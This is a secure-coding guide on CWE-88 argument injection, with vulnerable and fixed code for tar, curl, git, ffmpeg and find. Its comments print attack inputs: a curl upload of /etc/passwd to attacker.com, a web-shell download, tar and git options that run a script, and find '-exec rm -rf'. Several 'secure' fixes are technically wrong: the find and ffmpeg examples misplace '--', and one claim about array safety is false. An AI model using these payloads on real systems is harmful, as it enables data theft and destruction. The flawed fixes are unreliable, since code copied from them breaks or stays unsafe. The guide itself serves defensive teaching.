CWE-88: Argument Injection
Overview
Argument Injection occurs when untrusted user input is used to construct command-line arguments, function parameters, or system calls, allowing attackers to inject malicious arguments and alter program behavior.
Often, innocuous installed executables that may be called by an application can be subverted through command-line arguments to perform code execution or filesystem manipulation. These are called LOLBins
OWASP Classification
A05:2025 - Injection
Risk
High: Attackers can alter command behavior, bypass security controls, access sensitive data, or escalate privileges by injecting unexpected arguments.
Remediation Steps
Core principle: Never allow untrusted input to be parsed as command options/flags; validate and place it after a flag terminator where supported.
Trace the Data Path
Analyze how untrusted data reaches command execution:
Review scan results:
- Source: Identify where untrusted data enters (user input, external files, databases, network requests)
- Argument Construction: Look for string concatenation or direct use in command arguments
- Sink: Locate command execution functions (
system(),exec(),subprocess,Runtime.exec()) - Missing Validation: Identify gaps in input validation or parameterization
Find argument injection vulnerabilities proactively (good developer habits):
During development:
- Map all command executions: Identify every place your code invokes external programs (shell commands, system utilities, third-party binaries)
- Assume untrusted input is malicious: Any external input used in arguments could be an attack vector
- Understand flag behaviors: Know what dangerous flags each invoked program accepts (e.g., tar's
--checkpoint-action, curl's--upload-file, git's--git-dir) - Validate even with arrays: Using argument arrays prevents command injection but NOT argument injection - validation is still required
Code review checklist:
- Check all subprocess/exec calls: Does any user input reach command arguments?
- Look for flag injection: Can user input start with
-or--to inject flags? - Verify allowlist validation: Are only expected values permitted, or just "no shell metacharacters"?
- Review argument order: Is user input placed where flags are allowed (dangerous) or only after
--flag terminator? - Check for option injection: Can attackers inject options like
--option=valueor-o value?
Search your codebase for vulnerable patterns:
- Command execution with user input:
subprocess.run([cmd, user_input]),exec(["command", req.params]) - String concatenation in arguments:
["tar", "-czf", "file_" + user_input] - User input in first argument position:
subprocess.run([user_input, arg2])(extreme danger) - Commands that accept dangerous flags:
tar,curl,wget,git,rsync,find,ffmpeg - Missing validation before argument arrays
Use development tools:
- Static analysis: Configure tools to flag subprocess/exec calls with non-constant arguments (Semgrep, CodeQL)
- IDE warnings: Set up custom inspections for command execution patterns
- Dependency scanning: Check if libraries invoke commands with user input (e.g., image processing, archive handling)
- Security linters: Add rules to detect missing validation before exec calls
Architectural best practices:
- Avoid executing external commands: Use native libraries instead (e.g., zipfile instead of tar command, requests instead of curl)
- Constrain to specific commands: Don't allow user choice of which program to execute
- Use higher-level APIs: Libraries that abstract command execution with built-in validation
- Principle of least privilege: Run commands in restricted environments (containers, jails)
- Flag terminators: Place user input after
--to prevent flag injection:["command", "--", user_input]
Use Parameterized APIs (Primary Defense)
Use APIs that separate commands from arguments:
- Use argument arrays: Pass arguments as separate elements, not concatenated strings
- Example (Python):
subprocess.run(['ls', user_input])instead ofos.system('ls ' + user_input) - Disable shell invocation: Use
shell=False,UseShellExecute=false, etc. - Never concatenate untrusted data into command strings
Why this works: When arguments are separated, they cannot alter command structure with shell metacharacters.
Validate and Sanitize All Arguments
Even with parameterized APIs, validate untrusted data:
- Enforce strict validation: Define expected format using regex patterns
- Type checking: Ensure integers are integers, paths are valid paths, etc.
- Allowlist validation: Only permit known-good values
- Reject dangerous characters: Block
;,&,|,$, backticks, etc. (Note: this does not replace allowlist validation and should not be the primary defense.) - Length limits: Prevent DoS with excessively long arguments
Common validation patterns:
- Filenames:
^[a-zA-Z0-9._-]+$(no path separators) - Hostnames:
^[a-zA-Z0-9.-]+$ - Numbers:
^[0-9]+$
Apply Least Privilege
Limit damage if argument injection occurs:
- Run with minimal permissions: Don't run as root/Administrator
- Restrict command scope: Only allow necessary arguments
- Use containerization: Isolate processes with Docker/Kubernetes
- Apply OS-level restrictions: SELinux, AppArmor policies
Monitor and Log Command Execution
Enable detection and response:
- Log all command invocations with full arguments
- Alert on suspicious patterns: Unexpected arguments, special characters
- Monitor for failures: Track rejected/malformed arguments
- Review logs regularly: Identify attack attempts
Test with Malicious Inputs
Verify your fixes:
- Test with argument injection:
--help,-rf /,; whoami - Test with special characters:
;,&,|,$, backticks - Test encoding bypasses: URL-encoded, hex-encoded characters
- Ensure legitimate arguments still work correctly
- Re-scan with security scanner to confirm fix
Common Vulnerable Patterns
Flag Injection in tar Command (Python)
import subprocess
@app.route('/create-archive')
def create_archive():
filename = request.args.get('file')
# Uses argument array (prevents command injection)
# BUT: still vulnerable to argument injection!
subprocess.run(['tar', '-czf', 'archive.tar.gz', filename])
# Attack: file=--checkpoint=1
# Attack: file=--checkpoint-action=exec=sh exploit.sh
# Result: tar executes exploit.sh during archive creation
return "Archive created"
Flag Injection in curl Command (Java)
@PostMapping("/fetch-url")
public Response fetchUrl(@RequestParam String url) {
// Uses ProcessBuilder (prevents command injection)
// BUT: vulnerable to argument injection via flags
ProcessBuilder pb = new ProcessBuilder("curl", url);
Process p = pb.start();
// Attack: url=--upload-file /etc/passwd http://attacker.com
// Result: curl uploads /etc/passwd to attacker server
// Attack: url=-o /var/www/html/shell.php http://attacker.com/shell.txt
// Result: curl downloads shell to web directory
return Response.ok("Fetched");
}
Flag Injection in git Command (Node.js)
const { spawn } = require('child_process');
app.post('/clone-repo', (req, res) => {
const repoUrl = req.body.repo;
// Uses spawn with array (prevents command injection)
// BUT: vulnerable to argument injection
const git = spawn('git', ['clone', repoUrl]);
// Attack: repo=--upload-pack=exploit.sh https://github.com/user/repo
// Result: git executes exploit.sh during clone
// Attack: repo=-c protocol.ext.allow=always [...]
// Result: git config manipulation
git.on('close', (code) => {
res.send('Cloned');
});
});
Flag Injection in ffmpeg Command (PHP)
<?php
$input = $_POST['input_file'];
$output = $_POST['output_file'];
// Uses array syntax (prevents command injection)
// BUT: vulnerable to argument injection
// Validation is the primary defense; escapeshellcmd is defense in depth
$cmd = ['ffmpeg', '-i', $input, $output];
exec(escapeshellcmd(implode(' ', $cmd)));
// Attack: input=-f lavfi -i nullsrc -t 1 output.mp4
// Result: ffmpeg ignores intended input, creates attacker-controlled output
// Attack: output=-f data - (outputs to stdout instead of file)
Flag Injection in find Command (Python)
import subprocess
@app.route('/search')
def search_files():
pattern = request.args.get('pattern')
# Uses argument array (prevents command injection)
# BUT: vulnerable to flag injection
result = subprocess.run(
['find', '/var/data', '-name', pattern],
capture_output=True
)
# Attack: pattern=-exec rm -rf {} ;
# Result: find executes rm on every file found
# Attack: pattern=-delete (deletes all files)
return result.stdout
Secure Patterns
Allowlist Validation with Flag Terminator for tar (Python)
import subprocess
import re
FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.-]+$')
@app.route('/create-archive')
def create_archive():
filename = request.args.get('file', '')
# Validate filename format (no flags)
if not FILENAME_PATTERN.match(filename):
abort(400, "Invalid filename")
# Ensure doesn't start with dash (no flags)
if filename.startswith('-'):
abort(400, "Filename cannot start with dash")
# Additional length check
if len(filename) > 255:
abort(400, "Filename too long")
# Use -- to terminate flags (defense in depth)
subprocess.run(['tar', '-czf', 'archive.tar.gz', '--', filename],
check=True)
return "Archive created"
Why this works:
- Allowlist validation: Regex pattern restricts filenames to alphanumeric characters, underscores, dots, and dashes - no special shell characters or flag prefixes
- Dash prefix check: Explicitly rejects filenames starting with
-to prevent flag injection like--checkpoint-action=exec=malicious.sh - Length validation: Prevents DoS attacks with excessively long argument strings that could cause buffer issues or resource exhaustion
- Flag terminator (
--): The--argument tells tar to treat all subsequent arguments as filenames, not flags (defense in depth) - Subprocess array: Using
subprocess.run()with array prevents command injection by not invoking a shell interpreter
URL Validation with Domain Allowlist for curl (Java)
import java.net.URL;
import java.net.MalformedURLException;
private static final Pattern URL_PATTERN =
Pattern.compile("^https?://[a-zA-Z0-9.-]+(/[a-zA-Z0-9._/-]*)?$");
@PostMapping("/fetch-url")
public Response fetchUrl(@RequestParam String url) {
// Validate URL format
if (!URL_PATTERN.matcher(url).matches()) {
throw new BadRequestException("Invalid URL format");
}
// Parse and validate URL
try {
URL parsedUrl = new URL(url);
// Validate scheme
if (!parsedUrl.getProtocol().equals("https")) {
throw new BadRequestException("Only HTTPS URLs allowed");
}
// Validate domain allowlist
Set<String> allowedDomains = Set.of("api.example.com", "cdn.example.com");
if (!allowedDomains.contains(parsedUrl.getHost())) {
throw new BadRequestException("Domain not allowed");
}
} catch (MalformedURLException e) {
throw new BadRequestException("Invalid URL");
}
// Better: use Java HTTP client instead of curl
// HttpClient client = HttpClient.newHttpClient();
// HttpResponse<String> response = client.send(request, BodyHandlers.ofString());
// If you must use curl, ensure no flags
if (url.startsWith("-")) {
throw new BadRequestException("Invalid URL");
}
ProcessBuilder pb = new ProcessBuilder("curl", "--", url);
Process p = pb.start();
return Response.ok("Fetched");
}
Why this works:
- URL parsing: Java's
URLclass validates URL structure and prevents malformed URLs that could inject flags - Protocol allowlist: Restricts to HTTPS only, preventing dangerous protocols like
file://,gopher://, ordict://that could be exploited - Domain allowlist: Only allows specific trusted domains, preventing attackers from using flags like
--upload-fileto exfiltrate data to attacker servers - Dash prefix validation: Ensures URL doesn't start with
-to block flag injection attempts like-o /path/to/shell.php - Native HTTP client alternative: Comment suggests using Java's HttpClient instead of shelling out to curl, eliminating argument injection entirely
Repository URL Validation with Host Allowlist for git (Node.js)
const { spawn } = require('child_process');
const { URL } = require('url');
const ALLOWED_GIT_HOSTS = ['github.com', 'gitlab.com'];
app.post('/clone-repo', (req, res) => {
const repoUrl = req.body.repo;
// Parse and validate URL
let parsedUrl;
try {
parsedUrl = new URL(repoUrl);
} catch (e) {
return res.status(400).send('Invalid URL');
}
// Validate protocol
if (parsedUrl.protocol !== 'https:') {
return res.status(400).send('Only HTTPS URLs allowed');
}
// Validate host allowlist
if (!ALLOWED_GIT_HOSTS.includes(parsedUrl.hostname)) {
return res.status(400).send('Git host not allowed');
}
// Ensure URL doesn't start with dash
if (repoUrl.startsWith('-')) {
return res.status(400).send('Invalid URL format');
}
// Validate path format
if (!/^\/[a-zA-Z0-9_-]+\/[a-zA-Z0-9_-]+(\.git)?$/.test(parsedUrl.pathname)) {
return res.status(400).send('Invalid repository path');
}
// Use -- to terminate flags
const git = spawn('git', ['clone', '--', repoUrl], {
timeout: 30000, // Prevent DoS
shell: false
});
git.on('close', (code) => {
if (code === 0) {
res.send('Cloned');
} else {
res.status(500).send('Clone failed');
}
});
});
Why this works:
- URL parsing: Node.js
URLclass validates structure and prevents malformed URLs that could inject git flags - Protocol restriction: Only HTTPS allowed, preventing
git://orext::protocols that can execute arbitrary commands - Host allowlist: Restricts to trusted git hosting providers, preventing injection attacks like
--upload-pack=exploit.sh - Path validation: Regex ensures repository path follows expected format (
/user/repo), blocking unusual paths that could contain flags - Timeout protection: 30-second timeout prevents DoS attacks with slow or hanging clone operations
Filename Validation with Path Construction for ffmpeg (PHP)
<?php
// Validate input filename
$input = $_POST['input_file'] ?? '';
if (!preg_match('/^[a-zA-Z0-9_.-]+$/', $input)) {
http_response_code(400);
die('Invalid input filename');
}
if ($input[0] === '-') {
http_response_code(400);
die('Filename cannot start with dash');
}
// Validate output filename
$output = $_POST['output_file'] ?? '';
if (!preg_match('/^[a-zA-Z0-9_.-]+\.(mp4|webm|avi)$/', $output)) {
http_response_code(400);
die('Invalid output filename');
}
if ($output[0] === '-') {
http_response_code(400);
die('Filename cannot start with dash');
}
// Construct full paths
$base_input_dir = '/var/app/uploads/';
$base_output_dir = '/var/app/converted/';
$input_path = $base_input_dir . $input;
$output_path = $base_output_dir . $output;
// Verify input file exists
if (!file_exists($input_path) || !is_file($input_path)) {
http_response_code(404);
die('Input file not found');
}
// Use -- to terminate flags (defense in depth)
$cmd = [
'ffmpeg',
'-i', '--', $input_path,
'--', $output_path
];
// Execute with proper error handling
$result = null;
$output_lines = [];
exec(escapeshellcmd(implode(' ', $cmd)), $output_lines, $result);
if ($result !== 0) {
http_response_code(500);
die('Conversion failed');
}
echo 'Converted successfully';
Why this works:
- Allowlist validation: Regex restricts filenames to safe characters (alphanumeric, underscore, dot, dash) preventing flag injection and path traversal
- Extension validation: Output filename must match allowed video formats (mp4, webm, avi), preventing attackers from creating arbitrary file types
- Dash prefix check: Explicitly blocks filenames starting with
-to prevent flags like-f data -that could redirect output - Full path construction: Prepending trusted base directories prevents path traversal and confines files to expected locations
- File existence verification: Validates input file exists before processing, preventing ffmpeg errors and resource waste
Pattern Validation with Native Alternative for find (Python)
import subprocess
import re
FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.*?]+$') # Allow wildcards
@app.route('/search')
def search_files():
pattern = request.args.get('pattern', '')
# Validate pattern format
if not FILENAME_PATTERN.match(pattern):
abort(400, "Invalid search pattern")
# Reject if starts with dash (flag injection)
if pattern.startswith('-'):
abort(400, "Pattern cannot start with dash")
# Limit pattern length
if len(pattern) > 100:
abort(400, "Pattern too long")
# Better: use Python's glob or pathlib instead of find command
# from pathlib import Path
# matches = Path('/var/data').glob(pattern)
# If you must use find, place pattern after --
result = subprocess.run(
['find', '/var/data', '-name', '--', pattern],
capture_output=True,
timeout=10, # Prevent DoS
check=False
)
return result.stdout
Why this works:
- Pattern allowlist: Regex limits search patterns to alphanumeric characters and wildcards (
*,?), blocking dangerous flags like-execor-delete - Dash prefix validation: Explicitly rejects patterns starting with
-to prevent flag injection that could execute arbitrary commands - Length restriction: 100-character limit prevents DoS attacks with extremely long patterns that could cause resource exhaustion
- Native alternative recommended: Comment suggests using Python's
pathlib.glob()instead of shelling out to find, eliminating argument injection entirely - Timeout protection: 10-second timeout prevents hanging or slow operations from consuming server resources